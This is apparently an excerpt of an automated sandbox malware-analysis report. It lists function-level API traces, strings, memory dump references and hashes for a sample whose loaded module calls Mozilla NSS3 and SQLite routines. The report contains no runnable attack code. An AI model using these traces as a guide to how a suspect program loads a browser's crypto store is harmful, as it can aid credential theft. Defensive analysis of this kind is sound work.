                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                              • Opcode ID: 920b324e1d1e7234938d36a2429381800ffc126d7575cee37be8b9a71572bcc1
                                                                                                                                                                                                              • Instruction ID: 55973785ad05157bfd7d9ae91be97e8e86e223d4191665ea595d08e93e9fab15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 920b324e1d1e7234938d36a2429381800ffc126d7575cee37be8b9a71572bcc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E21D6B5200B108FC320DF6ED485A56B7F5FF49314B15486DEA8A9B722D772E880CF11
                                                                                                                                                                                                              Function 00931DF4 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                                                                                              • Opcode ID: 415e97d5646d5ee298f4764542bff39287c84ee5ced9bc926922c304b468027d
                                                                                                                                                                                                              • Instruction ID: 5fb5fc0ad304e80d353828be2e20d1a5e2e4847662d639424c5019544932b9a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415e97d5646d5ee298f4764542bff39287c84ee5ced9bc926922c304b468027d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBE02B3AA016315B8332193AD814666BB5E9FC5B60F094169EE48CB325C9B3CC038AE0
                                                                                                                                                                                                              Function 00927EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                              • Opcode ID: fcf873edacf0be8dcfaf543281f809098953717b6da47cf03db91fe37bfe167e
                                                                                                                                                                                                              • Instruction ID: 82c16eed7db55469825514193d86ca2936bbfc27dbfe8ff66f7170253eba0737
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcf873edacf0be8dcfaf543281f809098953717b6da47cf03db91fe37bfe167e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDE012B1A14208BFEF40DBA9EC45A9DBBF8EF44354F144065F909E3254E670EE00DB51

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 6CAD6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22120,6CAD7E60), ref: 6CAD6EBC
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD6EDF
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD6EF3
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6CAD6F25
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: TlsGetValue.KERNEL32(00000000,?,6CC214E4,?,6CA44DD9), ref: 6CAAA90F
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CAAA94F
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD6F68
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CAD6FA9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD70B4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD70C8
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC224C0,6CB17590), ref: 6CAD7104
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD7117
                                                                                                                                                                                                              • SECOID_Init.NSS3 ref: 6CAD7128
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000057), ref: 6CAD714E
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD717F
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD71A9
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3 ref: 6CAD71CF
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD71DD
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD71EE
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD7208
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7221
                                                                                                                                                                                                              • free.MOZGLUE(00000001), ref: 6CAD7235
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD724A
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD725E
                                                                                                                                                                                                              • PR_NotifyCondVar.NSS3 ref: 6CAD7273
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7281
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAD7291
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72B1
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72D4
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD72E3
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7301
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7310
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7335
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7344
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7363
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD7372
                                                                                                                                                                                                              • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CC10148,,defaultModDB,internalKeySlot), ref: 6CAD74CC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7513
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD751B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7528
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD753C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7550
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7561
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7572
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7583
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD7594
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75A2
                                                                                                                                                                                                              • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CAD75BD
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75C8
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD75F1
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD7636
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000), ref: 6CAD7686
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAD76A2
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CAD76B6
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CAD7707
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAD771C
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAD7731
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CAD774A
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CAD7770
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD7779
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD779A
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD77AC
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CAD77C4
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAD77DB
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(?,0000002F), ref: 6CAD7821
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CAD7837
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAD785B
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAD786F
                                                                                                                                                                                                              • SECMOD_AddNewModuleEx.NSS3 ref: 6CAD78AC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD78BE
                                                                                                                                                                                                              • SECMOD_AddNewModuleEx.NSS3 ref: 6CAD78F3
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD78FC
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD791C
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • kbi., xrefs: 6CAD7886
                                                                                                                                                                                                              • sql:, xrefs: 6CAD76FE
                                                                                                                                                                                                              • dll, xrefs: 6CAD788E
                                                                                                                                                                                                              • Spac, xrefs: 6CAD7389
                                                                                                                                                                                                              • extern:, xrefs: 6CAD772B
                                                                                                                                                                                                              • NSS Internal Module, xrefs: 6CAD74A2, 6CAD74C6
                                                                                                                                                                                                              • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CAD74C7
                                                                                                                                                                                                              • dbm:, xrefs: 6CAD7716
                                                                                                                                                                                                              • ,defaultModDB,internalKeySlot, xrefs: 6CAD748D, 6CAD74AA
                                                                                                                                                                                                              • rdb:, xrefs: 6CAD7744
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                              • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                              • API String ID: 3465160547-3797173233
                                                                                                                                                                                                              • Opcode ID: 0033a0a4518ac31c2ea5f9f2b850afdf1191d5e16e9db643e2800217092f2e3b
                                                                                                                                                                                                              • Instruction ID: 07bb3b998f611ebd143df005a1e60a5d276324f1b5cebdcfdd50e0c0bf897e11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0033a0a4518ac31c2ea5f9f2b850afdf1191d5e16e9db643e2800217092f2e3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1752F2B1E112419BEF158F64CC05BAE7BB4BF05308F1A4128ED09E7B45E771E998CB92
                                                                                                                                                                                                              Function 6CAE6D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA8EC,0000006C), ref: 6CAE6DC6
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA958,0000006C), ref: 6CAE6DDB
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEA9C4,00000078), ref: 6CAE6DF1
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEAA3C,0000006C), ref: 6CAE6E06
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6CBEAAA8,00000060), ref: 6CAE6E1C
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE6E38
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CAE6E76
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAE726F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE7283
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 3333340300-2657877971
                                                                                                                                                                                                              • Opcode ID: e0aaa147e4306422cc6996dc2307ae66f3be64c4bc236be55d10a052fe8c8dc4
                                                                                                                                                                                                              • Instruction ID: 64e18083a89714533b4d5c2e5a09cdd55b22f0d4fb5d7ab3ff61a72ca8728e89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0aaa147e4306422cc6996dc2307ae66f3be64c4bc236be55d10a052fe8c8dc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97729E75E052199FDF60DF28CC88B9ABBB5AF49304F1441A9D80DA7741EB31AAC4CF91
                                                                                                                                                                                                              Function 6CA53C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53C66
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CA53D04
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53EAD
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53ED7
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA53F74
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA54052
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA5406F
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CA5410D
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA5449C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 2597148001-598938438
                                                                                                                                                                                                              • Opcode ID: 192f7919013a8e32a545e3d8a0a232b1bf8185599c161e31fa8902d8781ec2f0
                                                                                                                                                                                                              • Instruction ID: 7cf78680c309b1b67fba0292d6c1e807af3eac505ebe97b48af5683bd1259e51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 192f7919013a8e32a545e3d8a0a232b1bf8185599c161e31fa8902d8781ec2f0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D82A075A01204DFCB04CF69C480B9EB7B2BF89318F698168D905ABB51D731ECA6CB91
                                                                                                                                                                                                              Function 6CB2AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB2ACC4
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CB2ACD5
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CB2ACF3
                                                                                                                                                                                                              • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CB2AD3B
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CB2ADC8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2ADDF
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2ADF0
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB2B06A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2B08C
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB2B1BA
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB2B27C
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00002010), ref: 6CB2B2CA
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB2B3C1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2B40C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1285963562-0
                                                                                                                                                                                                              • Opcode ID: f48245933e6c3b52c0e818a0d09113b35810bead17ba6cfd43ac5829aa8fba2a
                                                                                                                                                                                                              • Instruction ID: ccaed3c3ad6d91ab90d108984a21afb6afb79ff845511ec0e3ece94e3a2a617e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f48245933e6c3b52c0e818a0d09113b35810bead17ba6cfd43ac5829aa8fba2a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F322AF71904380AFE710CF14CC44BAA77A5EF84308F24856CE95D5B792EB7AE859CB92
                                                                                                                                                                                                              Function 6CAAECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAED38
                                                                                                                                                                                                                • Part of subcall function 6CA44F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA44FC4
